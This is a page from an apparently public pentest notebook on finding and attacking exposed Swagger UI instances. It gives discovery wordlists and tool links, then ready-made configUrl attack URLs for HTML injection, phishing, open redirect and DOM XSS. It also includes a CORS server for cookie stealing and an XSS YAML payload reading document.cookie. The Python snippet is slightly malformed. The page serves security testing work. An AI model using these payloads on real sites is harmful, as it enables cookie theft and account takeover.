> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/swagger-ui.md).

# Swagger UI

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Nuclei template

{% embed url="<https://github.com/coffinxp/nuclei-templates/blob/main/Swagger.yaml>" %}

{% embed url="<https://github.com/coffinxp/swagger/blob/main/Swagger.yaml>" %}

## Find Exposed Swagger

{% embed url="<https://github.com/brinhosa/apidetector/tree/main>" %}

### Wordlist

```
https://example.com/swagger.yaml
https://example.com/swagger.json
https://example.com/api-docs
https://example.com/v2/api-docs (Swagger 2.0)
https://example.com/v3/api-docs (OpenAPI 3)
```

{% embed url="<https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/swagger.txt>" %}

{% embed url="<https://github.com/coffinxp/swagger/blob/main/swagger-wordlist.txt>" %}

## OSINT

{% embed url="<https://github.com/UndeadSec/SwaggerSpy>" %}

## Audit endpoints

{% embed url="<https://github.com/BishopFox/sj>" %}

{% content-ref url="/pages/2nQo9jQkGanSbcZGflSg" %}
[REST API](/0xss0rz/pentest/api/rest-api.md)
{% endcontent-ref %}

### Burp Extension

Parse OpenAPI documentation using the OpenAPI Parser BApp

{% embed url="<https://portswigger.net/bappstore/6bf7574b632847faaaa4eb5e42f1757c>" %}

## Get versions and their vulnerabilities.

{% embed url="<https://github.com/ArcHound/swagger-ui-detector>" %}

<figure><img src="/files/Zo6vKZwXRfv7cvbrA3qb" alt=""><figcaption></figcaption></figure>

## Find old versions of Swagger-ui vulnerable to various XSS attacks - XSSwagger

{% embed url="<https://github.com/vavkamil/XSSwagger>" %}

## CVE-2018-25031

Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks.

{% embed url="<https://www.exploit-db.com/exploits/51379>" %}

{% embed url="<https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/>" %}

{% embed url="<https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96>" %}

Test: `/api/docs/?configUrl=https://jumpy-floor.surge.sh/test.json`

<figure><img src="/files/P2GRFZ86Nz7yFAjUbmPE" alt=""><figcaption></figcaption></figure>

### Repo

{% embed url="<https://github.com/coffinxp/swagger>" %}

Found Swagger try each of the file of the repo

```
# HTML Injection - Display a login form
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json
# Phishing method - Open Redirect - If the victim click on evil.com
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json
# DOM XSS
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json
http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json
```

### Cookie Stealing

Server with CORS Header

```python
from http.server import SimpleHTTPRequestHandler
import socketserver
class CORSRequestHandler(SimpleHTTPRequestHandler):
 def end_headers(self): 
 self.send_header('Access-Control-Allow-Origin', '*') 
 self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS') 
 super().end_headers()
if name == "__main__":
 PORT = 80 
 with socketserver.TCPServer(("", PORT), CORSRequestHandler) as httpd: 
 print("Serving at port", PORT) 
 httpd.serve_forever()
```

POC: `test.json`

```json
{ 
    "url": "http://IP/test.yaml", 
    "urls": [ 
    { 
    "url": "http://IP/test.yaml", 
    "name": "Foo" 
    } 
    ]
}
```

POC: `test.yaml`

```yaml
swagger: '2.0'
info:
 title: XSS Attack BY 0xss0rz
 description: | 
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form> 
 version: production
basePath: /JSSResource/
produces:
 - application/xml
 - application/json
consumes:
 - application/xml
 - application/json
security: - basicAuth: []
paths:
 /M0X0101:
  get:
   responses:
    '200':
     description: No response was specified
   tags: - XSS_D 
   operationId: findAccounts
   summary: Finds all accounts 
 '/hack/hachid/{id}':
  delete:
   parameters:
    - description: |
       <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
      format: int64 
      in: path 
      name: id 
      required: true 
      type: integer 
   responses:
    '200':
      description: No response was specified
```

<figure><img src="/files/3LH8j4PvIadoo9MNnloa" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/bhRgg8nVvcgJOCQmC79t" alt=""><figcaption></figcaption></figure>

Could lead to CSS exfiltration

{% embed url="<https://github.com/tarantula-team/CSS-injection-in-Swagger-UI?tab=readme-ov-file>" %}

## Postman / Scanner

{% embed url="<https://stackoverflow.com/questions/48525546/how-to-export-swagger-json-or-yaml>" %}

```
http://url/swagger/docs/v1
http://url/<contextPath>/v3/api-docs # JSON file
```

<figure><img src="/files/ljKGDqhdddhREZ0eF7o9" alt=""><figcaption></figcaption></figure>

or check source code:

```
const ui = SwaggerUIBundle({
  url: "https://petstore.swagger.io/v2/swagger.json",     // <-------
  dom_id: '#swagger-ui',
```

or dev tool

<figure><img src="/files/f920ocfEcijm9uUv45rY" alt=""><figcaption></figcaption></figure>

```
curl -o swagger.yaml https://example.com/swagger.yaml
```

If the swagger is a json file use yq to convert it: `pip install yq` or `apt install yq`

```
curl -s https://example.com/swagger.json | yq -P > swagger.yaml
```

You can now import the yaml file inside Postman or use it in scanner like Zap

{% content-ref url="/pages/2epJFSpvZTi3PzvJB97N" %}
[Postman Usage](/0xss0rz/pentest/api/postman-usage.md)
{% endcontent-ref %}

{% content-ref url="/pages/AHF1GP3z6ljW1L4mI3XL" %}
[ZAP Scanner & other scanning methods](/0xss0rz/pentest/api/zap-scanner-and-other-scanning-methods.md)
{% endcontent-ref %}

### SOAPi

{% embed url="<https://github.com/andrei8055/SOAPI>" %}

### Other Scanners

{% content-ref url="/pages/xZjnSlrUOfBYRuPF4xUw" %}
[Tools & Scanners](/0xss0rz/pentest/api/tools-and-scanners.md)
{% endcontent-ref %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Hacking APIs: Breaking Web Application Programming Interfaces**](https://www.amazon.fr/dp/1718502443?tag=0xss0rz-21)\
  A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
* [**Black Hat GraphQL: Attacking Next Generation APIs**](https://www.amazon.fr/dp/B0B7Q8BYG1?tag=0xss0rz-21)\
  This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
